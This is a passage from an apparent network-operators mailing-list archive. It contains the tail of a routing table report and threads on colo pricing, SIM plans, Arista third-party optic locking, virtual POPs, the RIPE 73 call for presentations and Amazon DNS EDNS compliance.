41.73.1.0/24 37004 -Reserved AS-, ZZ 41.73.2.0/24 37004 -Reserved AS-, ZZ 41.73.3.0/24 37004 -Reserved AS-, ZZ 41.73.4.0/24 37004 -Reserved AS-, ZZ 41.73.5.0/24 37004 -Reserved AS-, ZZ 41.73.6.0/24 37004 -Reserved AS-, ZZ 41.73.7.0/24 37004 -Reserved AS-, ZZ 41.73.8.0/24 37004 -Reserved AS-, ZZ Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:16 /9:13 /10:36 /11:101 /12:266 /13:516 /14:1049 /15:1769 /16:13136 /17:7794 /18:12731 /19:25299 /20:38387 /21:40059 /22:67338 /23:59077 /24:336969 /25:567 /26:581 /27:386 /28:53 /29:32 /30:14 /31:1 /32:34 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 39891 2896 3329 ALJAWWALSTC-AS , SA 22773 2723 3494 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 18566 2086 2194 MEGAPATH5-US - MegaPath Corporation, US 30036 1560 1745 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 6389 1438 2227 BELLSOUTH-NET-BLK - BellSouth.net Inc., 10620 1389 3477 Telmex Colombia S.A., CO 6983 1339 1688 ITCDELTA - Earthlink, Inc., US 34984 1266 1983 TELLCOM-AS , TR 11492 1166 1263 CABLEONE - CABLE ONE, INC., US 6849 968 1148 UKRTELNET , UA Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:1645 2:764 4:20 5:2146 6:31 8:983 12:1769 13:42 14:1755 15:45 16:2 17:92 18:125 20:50 22:1 23:1621 24:1792 27:2293 31:1782 32:69 33:4 35:5 36:325 37:2372 38:1249 39:36 40:94 41:2878 42:446 43:1868 44:44 45:2155 46:2545 47:85 49:1197 50:902 51:12 52:543 54:348 55:6 56:7 57:42 58:1639 59:1001 60:378 61:1812 62:1507 63:1929 64:4549 65:2182 66:4239 67:2205 68:1125 69:3261 70:1255 71:485 72:2006 74:2546 75:348 76:406 77:1426 78:1263 79:854 80:1276 81:1396 82:978 83:714 84:856 85:1593 86:491 87:1089 88:543 89:2060 90:214 91:6091 92:948 93:2326 94:2438 95:2481 96:504 97:353 98:943 99:41 100:78 101:1091 103:12006 104:2517 105:124 106:434 107:1329 108:648 109:2216 110:1283 111:1661 112:1042 113:1244 114:1073 115:1671 116:1639 117:1540 118:2025 119:1574 120:921 121:1115 122:2249 123:2026 124:1583 125:1821 128:631 129:426 130:412 131:1363 132:601 133:176 134:475 135:144 136:384 137:394 138:1820 139:423 140:547 141:456 142:660 143:944 144:733 145:163 146:937 147:655 148:1387 149:539 150:653 151:872 152:638 153:315 154:652 155:956 156:523 157:498 158:382 159:1149 160:511 161:730 162:2387 163:562 164:907 165:1076 166:321 167:1171 168:2051 169:664 170:1854 171:259 172:667 173:1665 174:756 175:694 176:1735 177:4029 178:2207 179:1162 180:2145 181:1824 182:2024 183:974 184:819 185:7204 186:3117 187:2131 188:2173 189:1728 190:7695 191:1270 192:9009 193:5729 194:4444 195:3843 196:1730 197:1130 198:5536 199:5733 200:7124 201:3644 202:10100 203:9840 204:4500 205:2727 206:2971 207:3083 208:4035 209:3868 210:3874 211:2068 212:2723 213:2338 214:852 215:70 216:5847 217:1984 218:798 219:608 220:1639 221:882 222:691 223:1278 End of report From ivanov_andrei at yahoo.com Thu Aug 18 00:42:37 2016 From: ivanov_andrei at yahoo.com (Andrei Ivanov) Date: Thu, 18 Aug 2016 00:42:37 +0000 (UTC) Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: <1572457311.15914129.1471480957881.JavaMail.yahoo@mail.yahoo.com> In San Francisco, CA one can get a cabinet with redundant A+B power, 120V/30A per circuit, for under $2,000/month.208V circuits will be more expensive.--andrei From: Justin Wilson To: NANOG Sent: Wednesday, August 17, 2016 3:20 PM Subject: Re: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit Indiana Data Centers: $600-900 per lit rack Chicago $1800 per lit rack Ohio $700-900 per lit rack Justin Wilson j2sw at mtin.net --- http://www.mtin.net Owner/CEO xISP Solutions- Consulting ? Data Centers - Bandwidth http://www.midwest-ix.com COO/Chairman Internet Exchange - Peering - Distributed Fabric > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > a) How much, in $/mo > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > generator, single UPS, 1+1 UPS, etc). > > c) What extent of diversity were you able to obtain vs. your other AC > circuits (unique riser?? separate transformer?? separate power feed from > second route into the building?) > From sean.watkins at gmail.com Thu Aug 18 18:49:25 2016 From: sean.watkins at gmail.com (Sean Watkins) Date: Thu, 18 Aug 2016 12:49:25 -0600 Subject: cheap SMS, was Email to text - In-Reply-To: References: <20160818175135.16264.qmail@ary.lan> Message-ID: Tings pricing looks really good. Anyone know of an equiv in Canada? Sean On Thu, Aug 18, 2016 at 11:59 AM, Eric Kuhnke wrote: > The "Ting" MVNO is owned/run by the Tucows people (remember them!) and runs > on either Sprint or T-Mobile's network depending on where you are. > > For very low data rate OOB access type things it can be as low as $10/mo > for an active LTE SIM card. > > https://ting.com/rates?ab=1 > > > > On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote: > > > >Then I went into a t-mobile store and bought a few $25/mo SIM cards, put > > credit card on file to auto renew each month, slapped them in, and > pointed > > our NMS?s at them. > > > > Since this comes up from time to time, here's the cheapest US SIM plans I > > know of. > > > > Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the > > cheapest plan is $18 for 90 days if you sign up and autorenew. That > > gives you 180 SMS. and if you want them 180 mins of voice and 180MB of > > data, unused rolls over. Customer service is OK, seems to be in the > > US, aimed at a bilingual Spanish/English market. > > > > Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500 > > SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice. > > They have very good US-based customer service. > > > > R's, > > John > > > -- -- Sean Watkins 403-629-6152 From john at hypergeek.net Thu Aug 18 21:42:54 2016 From: john at hypergeek.net (John A. Kilpatrick) Date: Thu, 18 Aug 2016 14:42:54 -0700 (PDT) Subject: Arista unqualified SFP In-Reply-To: <57B5AD1A.90408@foobar.org> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: On Thu, 18 Aug 2016, Nick Hilliard wrote: > It is always better to clarify this sort of thing with the account > management team before purchasing, and preferably have it in email or > writing. Exactly. Especially if you already have optics vendors that you like. I would bake that into the eval. -- John A. Kilpatrick john at hypergeek.net | http://www.hypergeek.net/ remember: no obstacles/only challenges From jackson.tim at gmail.com Sun Aug 21 02:14:47 2016 From: jackson.tim at gmail.com (Tim Jackson) Date: Sat, 20 Aug 2016 21:14:47 -0500 Subject: Arista unqualified SFP In-Reply-To: <57B5AD1A.90408@foobar.org> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: On Aug 18, 2016 7:42 AM, "Nick Hilliard" wrote: > It is always better to clarify this sort of thing with the account > management team before purchasing, and preferably have it in email or > writing. Sometimes you inherit bad situations... The (bad) solution is to program your own optics to match Arista ones so their switches can't tell the difference.. It's not hard, but a lot of the time it's out of the normal reach of a lot of customers. Flexoptix fixed that problem, but they're still priced way too high vs the OEMs that supply to them.. It's still terribly frustrating to deal with this issue in 2016. It's a desperate money grab from less informed customers. Arista should really stop this bad practice. I'd urge anybody buying any gear to make sure it can accept any optic meeting whatever MSA standard optics that it's able to have plugged into it. -- Tim From johnl at iecc.com Sun Aug 21 03:03:41 2016 From: johnl at iecc.com (John Levine) Date: 21 Aug 2016 03:03:41 -0000 Subject: cheap SMS, was Email to text - In-Reply-To: Message-ID: <20160821030341.24511.qmail@ary.lan> >Tings pricing looks really good. >Anyone know of an equiv in Canada? There isn't one. Ting is run by Tucows who are located in Toronto. They'd love to provide similar service in Canada, but the network operators aren't interested. R's, John From john at west-canaan.net Mon Aug 22 17:04:51 2016 From: john at west-canaan.net (John Zettlemoyer) Date: Mon, 22 Aug 2016 13:04:51 -0400 Subject: Lenovo & messagelabs Message-ID: We are getting multiples of Lenovo sales email in the last hour. The same sales email has come across about every 3 minutes for the last 30 minutes. I wrote "STOP" back to one of them, and now messagelabs has sent me a "The following recipient(s) cannot be reached" message about 6 times. Could someone from messagelabs or Lenovo please contact me off list. Thank you John Zettlemoyer Sr. Director of I.T. Infrastructure :: WCiT - West-Canaan LLC 856.310.1375 x221 :: john at wcit.net :: www.wcit.net Colocation, Cloud, Dedicated, Email, Backups, Access, Networks, etc. "I keep the lights blinking out of sequence!" From dwhite at olp.net Mon Aug 22 21:19:48 2016 From: dwhite at olp.net (Dan White) Date: Mon, 22 Aug 2016 16:19:48 -0500 Subject: GoDaddy Contact Message-ID: <20160822211948.GK8444@dan.olp.net> Please contact me off list. -- Dan White BTC Broadband Network Admin Lead Ph 918.366.0248 (direct) main: (918)366-8000 Fax 918.366.6610 email: dwhite at olp.net http://www.btcbroadband.com From benno at NLnetLabs.nl Tue Aug 23 10:59:39 2016 From: benno at NLnetLabs.nl (Benno Overeinder) Date: Tue, 23 Aug 2016 12:59:39 +0200 Subject: 2nd call for presentations RIPE 73 Message-ID: <9ff22bd1-2d19-a372-da3f-2648749b015b@NLnetLabs.nl> Dear colleagues, Please note the approaching deadline of 28 August 2016 for RIPE 73 plenary programme submissions. You can find the CFP for RIPE 73 below or at https://ripe73.ripe.net/submit-topic/cfp/, for your proposals for plenary session presentations, tutorials, workshops, BoFs (Birds of a Feather sessions) and lightning talks. Please also note that speakers do not receive any extra reduction or funding towards the meeting fee at the RIPE Meetings. Kind regards, Benno Overeinder RIPE PC Chair https://www.ripe.net/participate/meetings/ripe-meetings/pc -------------------->>><<<-------------------- Call for Presentations A RIPE Meeting is an open event where Internet Service Providers, network operators and other interested parties get together. Although the meeting is mostly technical, it is also a chance for people to meet and network with others in their field. RIPE 73 will take place from 24-28 October 2016 in Madrid, Spain. The RIPE Programme Committee (PC) is now seeking content proposals from the RIPE community for the plenary sessions, BoFs (Birds of a Feather sessions), panels, workshops, tutorials and lightning talks at RIPE 73. See the full descriptions of the different presentation formats, https://ripe73.ripe.net/submit-topic/presentation-formats/. Proposals for plenary sessions, BoFs, panels, workshops and tutorials must be submitted for full consideration no later than 28 August 2016. Proposals submitted after this date will be considered depending on the remaining available space in the programme. The PC is looking for presentations covering topics of network engineering and operations, including but not limited to: - IPv6 deployment - Managing IPv4 scarcity in operations - Commercial transactions of IPv4 addresses - Data centre technologies - Network and DNS operations - Internet governance and regulatory practices - Network and routing security - Content delivery - Internet peering and mobile data exchange - Internet of Things (IoT) Submissions RIPE Meeting attendees are quite sensitive to keeping presentations non-commercial, and product marketing talks are strongly discouraged. Repeated audience feedback shows that the most successful talks focus on operational experience, research results, or case studies. For example, presenters wishing to describe a commercial solution should focus on the underlying technology and not attempt a product demonstration. Presenters should indicate how much time they will require. In general, the time allocated for the different presentation formats is as follows: - Plenary presentations: 20-25 minutes presentation with 5-10 minutes discussion - Tutorials: up to two hours (Monday morning) - Workshops: one hour (during evening sessions) to two hours (Monday morning) - BoFs: approximately one hour - Lightning talks: 10 minutes The following general requirements apply: - Proposals must be submitted using the meeting submission system, https://ripe73.ripe.net/submit-topic/submission-form/. - Lightning talks should also be submitted using the meeting submission system (https://ripe73.ripe.net/submit-topic/submission-form/) and can be submitted any time up to and including the meeting week. The allocation of lightning talks will be announced on short notice---in some cases on the same day but often one day prior to the time slot allocated. - Presenters who propose a panel or BoF are encouraged to include speakers from several (perhaps even competing) companies and/or a neutral facilitator. - All presentation proposals will only be considered by the PC if they contain at least draft presentation slides (slides may be updated later on). For panels, proposals must contain a clear description, as well as the names of invited panellists, presenters and moderators. - Due to potential technical issues, presenters/panellists should be physically present at the RIPE Meeting. If you have any questions or requests concerning content submissions, please email pc [at] ripe [dot] net. -- Benno J. Overeinder NLnet Labs http://www.nlnetlabs.nl/ From amitchell at isipp.com Tue Aug 23 14:21:36 2016 From: amitchell at isipp.com (Anne Mitchell) Date: Tue, 23 Aug 2016 08:21:36 -0600 Subject: GoDaddy Contact In-Reply-To: References: Message-ID: <18CB9BBF-E1A3-4357-A88A-7DAEC97914E1@isipp.com> > Please contact me off list. Dan, if you'd like to let me know what this is about, we can probably connect you with someone. Anne Anne P. Mitchell, Attorney at Law Legislative Consultant CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance http://www.SuretyMail.com/ http://www.SuretyMail.eu/ Available for consultations by special arrangement. Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) Member, California Bar Cyberspace Law Committee Member, Colorado Cybersecurity Consortium Member, Asilomar Microcomputer Workshop Committee Ret. Professor of Law, Lincoln Law School of San Jose Ret. Chair, Asilomar Microcomputer Workshop amitchell at isipp.com | @AnnePMitchell Facebook/AnnePMitchell | LinkedIn/in/annemitchell From ryan.g at atwgpc.net Tue Aug 23 14:58:36 2016 From: ryan.g at atwgpc.net (Ryan Gelobter) Date: Tue, 23 Aug 2016 09:58:36 -0500 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: Instead of patching the python what happens if you just run 'no errdisable recovery cause xcvr-unsupported' On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote: > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your customers > when they ask for it? > If it is required to sign some papers which declare that I am aware of all > the risks and losing my warranty - I agree with that, lets do it. Any way > what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this situation. > If you have any other questions regarding enabling 3rd party options in > Arista switches, I suggest to contact your local account team (or sales) > for further discussion on this matter. > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of them > has been even detected on the switch, it was acting like nothing has been > inserted. I guess that even if I get the key, most of my transceivers/DAC > (which work like a champ in Juniper or Extreme switches) cables wouldnt > work. > > I'm writing this post to make somebody who considers buying their switches > be aware of what they'd get. Just buy Juniper instead. > > > > Stanislaw wrote at 2016-08-17 23:25: > >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson ????? 2016-08-17 22:57: >> >> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>> >>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to unlock >>>> off-brand xcievers usage (by some service command or so). >>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are not in >>>> errdisable state anymore. But despite of xceivers are detected correctly, >>>> links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be very >>>> appreciated. Thanks. >>>> >>> From sryan at arbor.net Tue Aug 23 15:00:35 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Tue, 23 Aug 2016 15:00:35 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> , Message-ID: It won't work. They require the hashed key that support/your AM has to generate for your org. Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Ryan Gelobter Sent: Tuesday, August 23, 2016 10:58:36 AM To: Stanislaw Cc: nanog list Subject: Re: Arista unqualified SFP Instead of patching the python what happens if you just run 'no errdisable recovery cause xcvr-unsupported' On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote: > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your customers > when they ask for it? > If it is required to sign some papers which declare that I am aware of all > the risks and losing my warranty - I agree with that, lets do it. Any way > what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this situation. > If you have any other questions regarding enabling 3rd party options in > Arista switches, I suggest to contact your local account team (or sales) > for further discussion on this matter. > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of them > has been even detected on the switch, it was acting like nothing has been > inserted. I guess that even if I get the key, most of my transceivers/DAC > (which work like a champ in Juniper or Extreme switches) cables wouldnt > work. > > I'm writing this post to make somebody who considers buying their switches > be aware of what they'd get. Just buy Juniper instead. > > > > Stanislaw wrote at 2016-08-17 23:25: > >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson ????? 2016-08-17 22:57: >> >> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>> >>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to unlock >>>> off-brand xcievers usage (by some service command or so). >>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are not in >>>> errdisable state anymore. But despite of xceivers are detected correctly, >>>> links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be very >>>> appreciated. Thanks. >>>> >>> From ryan.g at atwgpc.net Tue Aug 23 19:05:52 2016 From: ryan.g at atwgpc.net (Ryan Gelobter) Date: Tue, 23 Aug 2016 14:05:52 -0500 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> Message-ID: But that is all done in the python script I imagine, it doesn't look like theirs really much validation unless I'm missing something. Shouldn't be too hard to figure out what its doing in the background after you run that command. On Tue, Aug 23, 2016 at 10:00 AM, Ryan, Spencer wrote: > It won't work. They require the hashed key that support/your AM has to > generate for your org. > > > > * Spencer Ryan* | Senior Systems Administrator | sryan at arbor.net > *Arbor Networks* > +1.734.794.5033 (d) | +1.734.846.2053 (m) > www.arbornetworks.com > > ------------------------------ > *From:* NANOG on behalf of Ryan Gelobter < > ryan.g at atwgpc.net> > *Sent:* Tuesday, August 23, 2016 10:58:36 AM > *To:* Stanislaw > *Cc:* nanog list > *Subject:* Re: Arista unqualified SFP > > Instead of patching the python what happens if you just run 'no errdisable > recovery cause xcvr-unsupported' > > On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote: > > > Hi all, > > If somebody is following my epic adventure of getting uqualified SFP to > > work on Aristas, here is the unhappy end of it. > > > > I've written to Arista support and got the following dialogue: > > Support guy: > > Hi, > > Thank you for contacting Arista Support. My name is **** and I'll be > > assisting you on this case. > > Could you please provide the "show version" output from this switch? > > > > Me: > > Hi, > > Here it is: > > > > > > Support guy: > > Hi, > > Thank you for the information. > > Unfortunately, we are unable to activate your 3rd party components. To > > ensure ongoing quality, Arista devices are designed to support only > > properly qualified transceivers. > > Please let me know if you have any other questions. > > > > Me: > > I do not understand, > > But there is a command which allows using non-Arista transceivers. Why > > have you implemented it but don't provide an access key to your customers > > when they ask for it? > > If it is required to sign some papers which declare that I am aware of > all > > the risks and losing my warranty - I agree with that, lets do it. Any way > > what are the conditions to receive that access key? > > > > Support guy: > > I'm afraid that there is nothing I'm able to do regarding this situation. > > If you have any other questions regarding enabling 3rd party options in > > Arista switches, I suggest to contact your local account team (or sales) > > for further discussion on this matter. > > > > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of them > > has been even detected on the switch, it was acting like nothing has been > > inserted. I guess that even if I get the key, most of my transceivers/DAC > > (which work like a champ in Juniper or Extreme switches) cables wouldnt > > work. > > > > I'm writing this post to make somebody who considers buying their > switches > > be aware of what they'd get. Just buy Juniper instead. > > > > > > > > Stanislaw wrote at 2016-08-17 23:25: > > > >> Hi Tim, > >> > >> Thanks for your expressive answer. Will try it :) > >> > >> Tim Jackson ????? 2016-08-17 22:57: > >> > >> I'd suggest bitching and moaning at your account team & support until > >>> they give you the key to unlock them.. > >>> > >>> -- > >>> Tim > >>> > >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: > >>> > >>> Hi all, > >>>> Is there a way for unlocking off-brand transceivers usage on Arista > >>>> switches? > >>>> > >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has > >>>> been found out that Arista switches seem to not have possibility to > unlock > >>>> off-brand xcievers usage (by some service command or so). > >>>> > >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the > >>>> checking function bypass the actual check and it helped: ports are > not in > >>>> errdisable state anymore. But despite of xceivers are detected > correctly, > >>>> links aren't coming up (they are in notconnect state). > >>>> > >>>> If anyone possibly have does have a sacred knowledge of bringing > >>>> off-branded transceivers to life on Arista switches, your help'd be > very > >>>> appreciated. Thanks. > >>>> > >>> > From sunyucong at gmail.com Tue Aug 23 22:31:11 2016 From: sunyucong at gmail.com (Yucong Sun) Date: Tue, 23 Aug 2016 22:31:11 +0000 Subject: What's the meaning of virtual POP ? Message-ID: Hi, I came across the idea of the virtual POP , but the website for them have way too much jargon to me[1][2][3], can someone explain it like i'm five (:-D)? Specifically, my question is : 1. Is virtual POP basically a L2VPN? That is, the provider will provide a port at site A,that is somehow connected to LAN of site B ? What's difference with vpop and layer 2 transport then? 2. Do such vPOP have guaranteed latency/bandwidth? 3. Is that really useful? If I'm already buying transit bandwidth/announce my blocks from provider, the site B peers is already going to send traffic through provider's backbone to site A, then what's the difference? Thanks! example 1. http://www.ixreach.com/services/colocation/virtual-pop/ 2. http://www.interoute.com/network-box-virtual-pop-vpop 3. https://www.linx.net/join-linx/vpop From bill at herrin.us Tue Aug 23 22:46:21 2016 From: bill at herrin.us (William Herrin) Date: Tue, 23 Aug 2016 18:46:21 -0400 Subject: What's the meaning of virtual POP ? In-Reply-To: References: Message-ID: On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote: > I came across the idea of the virtual POP , but the website for them have > way too much jargon to me[1][2][3], can someone explain it like i'm five > (:-D)? A virtual Point Of Presence means that you provide services at a location via someone else's facilities. The classic example was extending a PRI for dialup modems inside a particular local calling area via a point-to-point T1 back to your modem bank somewhere else that would have been a long distance call for those customers. If you put a modem bank in their local calling area, it's a POP. If you extend the circuit from their local calling area back to your modem bank elsewhere, it's a virtual POP. Modern examples of virtual POPs are much fancier but it's the same basic idea. > 1. Is virtual POP basically a L2VPN? It can be. Depends on what service you're extending from the "virtual" location. > 2. Do such vPOP have guaranteed latency/bandwidth? Depends on what you're extending and how. > 3. Is that really useful? It can be. It can let you dip your toes in a market without a large up-front investment in equipment and backhaul. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From sunyucong at gmail.com Tue Aug 23 23:20:05 2016 From: sunyucong at gmail.com (Yucong Sun) Date: Tue, 23 Aug 2016 23:20:05 +0000 Subject: What's the meaning of virtual POP ? In-Reply-To: References: Message-ID: Thanks for the explanation. I understand on layer 2 or like william point out (on anything other than IP) it make total sense. However on layer 3, with existing transit bandwith with said provider it would be redudant. (Assume The one you wanted peer at site b is already peering with your provider). Cheers. On Tue, Aug 23, 2016, 15:51 Rod Beck wrote: > Yes, except it is done via Switched Ethernet and VLANs. The idea behind > virtual peering. Your gear is in Amsterdam and someone gives you VLANs to > LINX. > > > - R. > > > ------------------------------ > *From:* NANOG on behalf of William Herrin < > bill at herrin.us> > *Sent:* Wednesday, August 24, 2016 12:46 AM > *To:* Yucong Sun > *Cc:* NANOG > > *Subject:* Re: What's the meaning of virtual POP ? > On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote: > > I came across the idea of the virtual POP , but the website for them > have > > way too much jargon to me[1][2][3], can someone explain it like i'm five > > (:-D)? > > A virtual Point Of Presence means that you provide services at a > location via someone else's facilities. > > The classic example was extending a PRI for dialup modems inside a > particular local calling area via a point-to-point T1 back to your > modem bank somewhere else that would have been a long distance call > for those customers. If you put a modem bank in their local calling > area, it's a POP. If you extend the circuit from their local calling > area back to your modem bank elsewhere, it's a virtual POP. > > Modern examples of virtual POPs are much fancier but it's the same basic > idea. > > > > 1. Is virtual POP basically a L2VPN? > > It can be. Depends on what service you're extending from the "virtual" > location. > > > > 2. Do such vPOP have guaranteed latency/bandwidth? > > Depends on what you're extending and how. > > > > 3. Is that really useful? > > It can be. It can let you dip your toes in a market without a large > up-front investment in equipment and backhaul. > > Regards, > Bill Herrin > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us > Owner, Dirtside Systems ......... Web: > Dirtside Systems > www.dirtside.com > Welcome! You are our 370,765 th guest. Dirtside builds ground systems and > ground system software for the satellite and mobile communications > industries. > > From marka at isc.org Tue Aug 23 23:37:10 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 24 Aug 2016 09:37:10 +1000 Subject: Can someone from Amazon please answer. Message-ID: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> I'm curious. What are you trying to achieve by blocking EDNS version negotiation? Is it really too hard to return BADVERS to a EDNS query with version != 0 along with the version of EDNS you support in the version field? Are you deliberately trying to prevent the IETF from deciding to bump the EDNS version in the future? Do you have firewalls that have this behaviour hard coded? Do you even test for RFC compliance? Mark lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From jared at puck.nether.net Wed Aug 24 00:23:34 2016 From: jared at puck.nether.net (Jared Mauch) Date: Tue, 23 Aug 2016 20:23:34 -0400 Subject: What's the meaning of virtual POP ? In-Reply-To: References: Message-ID: <8E75804D-0728-450F-A372-EAEE7D89776E@puck.nether.net> This could be done with an OPS and diverse fibers or a dual transponder type solution or an Ethernet ring amongst other solutions. It generally means to router geeks that a router isn't there, but some other technology is in use. Often it is a growing market or declining market for the provider. Jared Mauch > On Aug 23, 2016, at 7:20 PM, Yucong Sun wrote: > > However on layer 3, with existing transit bandwith with said provider it > would be redudant. (Assume The one you wanted peer at site b is already > peering with your provider). From hannigan at gmail.com Wed Aug 24 03:59:49 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Tue, 23 Aug 2016 23:59:49 -0400 Subject: Question re: Routing Table Report Was: Re: [pacnog] Weekly Routing Table Report Message-ID: Phillip, Geoff, et. al. [ trimmed dist, please feel free to expand if you think it's proper ] On Fri, Aug 19, 2016 at 2:01 PM, Routing Analysis Role Account wrote: > > Advertised Unallocated Addresses > -------------------------------- > > Network Origin AS Description > 23.249.144.0/20 40430 COLO4JAX-AS - colo4jax, LLC, US > 27.100.7.0/24 56096 UNKNOWN > 41.73.1.0/24 37004 -Reserved AS-, ZZ > 41.73.2.0/24 37004 -Reserved AS-, ZZ > 41.73.3.0/24 37004 -Reserved AS-, ZZ > 41.73.4.0/24 37004 -Reserved AS-, ZZ > 41.73.5.0/24 37004 -Reserved AS-, ZZ > 41.73.6.0/24 37004 -Reserved AS-, ZZ > 41.73.7.0/24 37004 -Reserved AS-, ZZ > 41.73.8.0/24 37004 -Reserved AS-, ZZ > > Complete listing at 